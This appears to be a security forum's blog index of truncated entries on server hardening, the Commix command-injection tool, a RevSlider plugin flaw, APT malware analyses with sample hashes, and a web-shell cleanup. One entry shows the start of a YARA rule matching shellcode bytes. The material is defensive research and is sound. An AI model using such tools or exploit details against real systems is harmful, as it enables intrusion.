
All Blog Entries

  1. How to Setup Secure Website for Hackers

    When security researchers and hackers want to set up a self-hosted blog, the biggest stress on their head is what to do to secure their server(s) and site(s). What if someone comes and naughties their server(s)? What if the server gets a DOS/DDOS attack when they don't have access to fix up their server(s) and they are travelling or go for business or something and they can't access their server(s) for some reason. After some years that I spent my life on information security I realise that nothing can't be secure ...

    Updated 05-29-2015 at 08:59 PM by G3n3Rall

    Tags: linux, php, python, service, waf, zap
    Categories: Uncategorized
  2. Commix : Automated All-in-One OS Command Injection and Exploitation Tool

    Quote Originally Posted by plage
    Hello all, it recently came to my attention a command injection exploitation tool, which has the name commix ( 1 ), and by using it, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string.

    Commix seems to be a great command injection tool which successfully exploits many vulnerable applications such as DVWA, bWAPP, ShelLOL, Persistence, Kioptrix(2014), w3af-moth etc.

    I found references on that tool in many sites,
    ...
    Categories: Uncategorized
  3. WordPress Plugin – Revslider update captions CSS file critical vulnerability

    Today being another day at work for SecureLayer7 to recover our client's defaced website, and bang, I think I hit upon a nasty vulnerability in a famous plugin.

    Although we successfully patched the vulnerability and fixed the undoing of the blacklisting, on further research I stumbled upon its usage over the internet, and as it turns out a large number of web users online are affected, putting them at greater risk if not mitigated with a proper patch or an update.

    Following ...
    Tags: '(."(, upyx
    Categories: Uncategorized
  4. Apt inception

    Greet: "Vinnu", "nightrover","bond"

    In the month of Dec 2014 BlueCoat released a report on an APT campaign named "Inception". The spear phishing mail was sent with attachments under various names; we analyzed the attachment named "Car for sale.doc". The attachment was an exploit (CVE-2012-0158) with embedded VBS and a decoy file themed as an advertisement of a used car for sale that purportedly originated from Michael Hahne, an employee at the ...

    Updated 03-23-2015 at 05:59 PM by 41.w4r10r

    Categories: Uncategorized
  5. Apt sme

    Greet : "Vinnu", "nightrover","bond"

    I have used the name "APT SME" because the payload developer used the name for his project. I have just created automation to extract the payload file from the exploit used in APT SME.

    Sample used for creating Automation:
    Md5 - 57A8DB5A5D35464BE16518332A64A992

    ...

    Updated 03-20-2015 at 12:00 PM by w@rri0r@bh@y

    Categories: Uncategorized
  6. Apt vitnam

    Greet :- "vinnu","nightrover","bond"

    I used the name "VITNAM" because the decoy file had some contents from Vietnam. Here I have automated a process through which we can extract an executable from an RTF exploit.

    Yara Rule:
    Code:
    rule APT_VITNAM {
      meta:
       author = "w@rri0r@bh@y"
      strings :
       $magic = "{\\rt"
       $v0 = "eb00eb1490905e33c980368746"
    ...

    Updated 03-20-2015 at 02:35 PM by [s]

    Categories: Uncategorized
  7. Apt carbanak

    Greet : "Vinnu", "nightrover","bond"

    All the analysis was done by the "Kaspersky" company. I have just created automation to extract the payload from the exploit used in APT CARBANAK.

    Sample used for creating Automation:
    Md5 - 8fa296efaf87ff4d9179283d42372c52, 665b6cb31d962aefa3037b5849889e06, 2c395f211db2d02cb544448729d0f081, 31e16189e9218cb131fdb13e75d0a94f, db83e301564ff613dd1ca23c30a387f0, 86e48a9be62494bffb3b8e5ecb4a0310, 6c7ac8dfd7bc5c2bb1a6d7aec488c298 ...

    Updated 03-20-2015 at 12:01 PM by w@rri0r@bh@y

    Categories: Uncategorized
  8. Collective Intelligence Framework – An awesome and pretty useful project

    Hello Hackers!

    How are you doing?
    I am here today to shed some light on a nice and open source project called Collective Intelligence Framework (CIF).

    About 70% of internet traffic is … wait for it … SPAM! If you don't believe me, install a service honeypot, give it about 10 minutes and then see the magic. Or give your machine a direct public interface and start TCPDump.

    The internet is full of crap / awesome stuff (in the eye of the beholder) like exploit ...
  9. Malware Cleanup: Analysis of an Undetectable web-shell code uploaded, RevSlider bug

    I started my day with my regular Malware Cleanup activity and came across an interesting backdoor web shell file on the server. The server is not specific to any particular environment; it was one of the regularly updated WordPress packages with the RevSlider plugin ver. 4.1.4.

    I initiated the process to detect the backdoors and web malware, and got a hit on a malicious .htaccess file which was redirecting to hxxp://m.mobi-avto.ru as shown below:

    ...